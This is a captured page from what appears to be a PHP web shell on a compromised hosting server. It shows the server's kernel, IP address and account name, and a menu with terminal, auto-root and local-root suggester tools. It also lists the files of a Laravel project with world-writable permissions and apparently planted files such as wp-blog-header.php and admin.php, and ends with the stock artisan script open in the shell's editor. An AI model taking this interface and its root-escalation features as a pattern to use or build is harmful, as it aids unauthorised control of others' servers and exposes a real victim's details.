Linux premium219.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 66.29.141.197 & Your IP : 216.73.216.254
Domains :
Cant Read [ /etc/named.conf ]
User : removmno
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
removmno /
backend /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
bootstrap
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
config
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
database
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
public
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
resources
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
routes
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
storage
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
tests
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
vendor
[ DIR ]
drwxrwxrwx
2026-06-10 08:55
wk
[ DIR ]
drwxr-xr-x
2026-06-10 08:55
.env
1.26
KB
-rw-r--r--
2024-04-08 18:24
.htaccess
197
B
-r--r--r--
2026-06-10 08:55
README.md
4.01
KB
-rw-rw-rw-
2024-01-04 22:47
admin.php
32.33
KB
-rw-r--r--
2026-06-06 06:44
artisan
1.65
KB
-rwxrwxrwx
2024-01-04 22:47
composer.json
2.04
KB
-rw-rw-rw-
2024-07-28 18:50
composer.lock
304.86
KB
-rw-rw-rw-
2024-07-28 18:50
error_log
1.78
MB
-rw-r--r--
2025-07-18 22:59
package.json
248
B
-rw-rw-rw-
2024-01-04 22:47
phpunit.xml
1.11
KB
-rw-rw-rw-
2024-01-04 22:47
vite.config.js
263
B
-rw-rw-rw-
2024-01-04 22:47
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-06-10 08:55
wp-cron.php
2.74
KB
-rw-r--r--
2026-06-10 08:55
Save
Rename
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any of our classes manually. It's great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);